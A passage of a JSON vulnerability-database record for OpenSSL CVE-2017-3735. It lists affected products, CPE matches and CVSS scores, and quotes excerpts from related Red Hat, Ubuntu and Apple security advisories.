"bluecoat", "version": "4.6" }, { "model": "unified agent", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.0" }, { "model": "ssl visibility 3.8.4fc", "scope": null, "trust": 0.3, "vendor": "bluecoat", "version": null }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.12" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.11" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.10" }, { "model": "security analytics", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.3" }, { "model": "security analytics", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.2" }, { "model": "security analytics", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1" }, { "model": "proxysg", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.7" }, { "model": "proxysg", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.6" }, { "model": "proxysg", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5" }, { "model": "proxyclient", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.4" }, { "model": "proxyav", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "policycenter s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.9" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.6" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.11" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "mail threat defense", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "intelligencecenter data collector", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.3" }, { "model": "intelligencecenter", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.3" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.3" }, { "model": "content analysis", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.2" }, { "model": "content analysis", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.1" }, { "model": "client connector", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.6" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.4.0" }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "android mobile agent", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.3" }, { "model": "advanced secure gateway", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.7" }, { "model": "advanced secure gateway", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.6" }, { "model": "project openssl 1.1.0f-git", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2l-git", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.8.0.2" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.7.2.7" } ], "sources": [ { "db": "BID", "id": "100515" }, { "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "db": "CNNVD", "id": "CNNVD-201708-1172" }, { "db": "NVD", "id": "CVE-2017-3735" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8zg:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8v:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8zc:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8ze:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8z:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8za:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8zb:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2017-3735" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Google\u0027s OSS-Fuzz project", "sources": [ { "db": "BID", "id": "100515" } ], "trust": 0.3 }, "cve": "CVE-2017-3735", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2017-3735", "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 1.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2017-3735", "impactScore": 1.4, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2017-3735", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2017-3735", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2017-3735", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201708-1172", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2017-3735", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2017-3735" }, { "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "db": "CNNVD", "id": "CNNVD-201708-1172" }, { "db": "NVD", "id": "CVE-2017-3735" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g. OpenSSL is prone to a security-bypass vulnerability. \nSuccessfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks. Summary:\n\nSecurity Advisory\n\n2. Description:\n\nRed Hat Ansible Tower 3.3.1 is now available and contains the following bug\nfixes:\n\n- - Fixed event callback error when in-line vaulted variables are used with\n``include_vars``\n- - Fixed HSTS and X-Frame-Options to properly be set in nginx configuration\n- - Fixed isolated node setup to no longer fail when ``ansible_host`` is used\n- - Fixed selection of custom virtual environments in job template creation\n- - Fixed websockets for job details to properly work\n- - Fixed the ``/api/v2/authtoken`` compatibility shim\n- - Fixed page size selection on the jobs screen\n- - Fixed instances in an instance group to properly be disabled in the user\ninterface\n- - Fixed the job template selection in workflow creation to properly render\n- - Fixed ``member_attr`` to properly set on some LDAP configurations during\nupgrade, preventing login\n- - Fixed ``PosixUIDGroupType`` LDAP configurations\n- - Improved the RAM requirement in the installer preflight check\n- - Updated Tower to properly report an error when relaunch was used on a set\nof failed hosts that is too large\n- - Updated sosreport configuration to gather more python environment, nginx,\nand supervisor configuration\n- - Fixed display of extra_vars for scheduled jobs\n\n3. Solution:\n\nThe Ansible Tower Upgrade and Migration Guide is available at:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. ==========================================================================\nUbuntu Security Notice USN-3611-2\nApril 17, 2018\n\nopenssl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This update provides\nthe corresponding update for Ubuntu 12.04 ESM. (CVE-2017-3735)\n\n It was discovered that OpenSSL incorrectly handled certain ASN.1\n types. A remote attacker could possibly use this issue to cause a\n denial of service. (CVE-2018-0739)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 ESM:\n libssl1.0.0 1.0.1-4ubuntu5.40\n openssl 1.0.1-4ubuntu5.40\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2017-12-6-1 macOS High Sierra 10.13.2, Security Update\n2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nmacOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and\nSecurity Update 2017-005 El Capitan are now available and address\nthe following:\n\napache\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: Processing a maliciously crafted Apache configuration\ndirective may result in the disclosure of process memory\nDescription: Multiple issues were addressed by updating to\nversion 2.4.28. \nCVE-2017-9798\n\ncurl\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: Malicious FTP servers may be able to cause the client to read\nout-of-bounds memory\nDescription: An out-of-bounds read issue existed in the FTP PWD\nresponse parsing. This issue was addressed with improved bounds\nchecking. \nCVE-2017-1000254: Max Dymond\n\nDirectory Utility\nAvailable for: macOS High Sierra 10.13 and macOS High Sierra 10.13.1\nNot impacted: macOS Sierra 10.12.6 and earlier\nImpact: An attacker may be able to bypass administrator\nauthentication without supplying the administrator\u0027s password\nDescription: A logic error existed in the validation of credentials. \nThis was addressed with improved credential validation. \nCVE-2017-13872\n\nIntel Graphics Driver\nAvailable for: macOS High Sierra 10.13.1\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-13883: an anonymous researcher\n\nIntel Graphics Driver\nAvailable for: macOS High Sierra 10.13.1\nImpact: A local user may be able to cause unexpected system\ntermination or read kernel memory\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-2017-13878: Ian Beer of Google Project Zero\n\nIntel Graphics Driver\nAvailable for: macOS High Sierra 10.13.1\nImpact: An application may be able to execute arbitrary code with\nsystem privileges\nDescription: An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2017-13875: Ian Beer of Google Project Zero\n\nIOAcceleratorFamily\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: An application may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-13844: found by IMF developed by HyungSeok Han (daramg.gift)\nof SoftSec, KAIST (softsec.kaist.ac.kr)\n\nIOKit\nAvailable for: macOS High Sierra 10.13.1\nImpact: An application may be able to execute arbitrary code with\nsystem privileges\nDescription: An input validation issue existed in the kernel. This\nissue was addressed through improved input validation. \nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\nCVE-2017-13858: an anonymous researcher\n\nIOKit\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: An application may be able to execute arbitrary code with\nsystem privileges\nDescription: Multiple memory corruption issues were addressed through\nimproved state management. \nCVE-2017-13847: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-13862: Apple\n\nKernel\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: An application may be able to read restricted memory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2017-13833: Brandon Azad\n\nKernel\nAvailable for: macOS High Sierra 10.13.1\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-13876: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: An application may be able to read restricted memory\nDescription: A type confusion issue was addressed with improved\nmemory handling. \nCVE-2017-13855: Jann Horn of Google Project Zero\n\nKernel\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-13867: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: macOS High Sierra 10.13.1\nImpact: An application may be able to read restricted memory\nDescription: A validation issue was addressed with improved input\nsanitization. \nCVE-2017-13865: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: An application may be able to read restricted memory\nDescription: A validation issue was addressed with improved input\nsanitization. \nCVE-2017-13868: Brandon Azad\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nMail\nAvailable for: macOS High Sierra 10.13.1\nImpact: A S/MIME encrypted email may be inadvertently sent\nunencrypted if the receiver\u0027s S/MIME certificate is not installed\nDescription: An inconsistent user interface issue was addressed with\nimproved state management. \nCVE-2017-13871: an anonymous researcher\n\nMail Drafts\nAvailable for: macOS High Sierra 10.13.1\nImpact: An attacker with a privileged network position may be able to\nintercept mail\nDescription: An encryption issue existed with S/MIME credetials. The\nissue was addressed with additional checks and user control. \nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nOpenSSL\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X\nEl Capitan 10.11.6\nImpact: An application may be able to read restricted memory\nDescription: An out-of-bounds read issue existed in\nX.509 IPAddressFamily parsing. This issue was 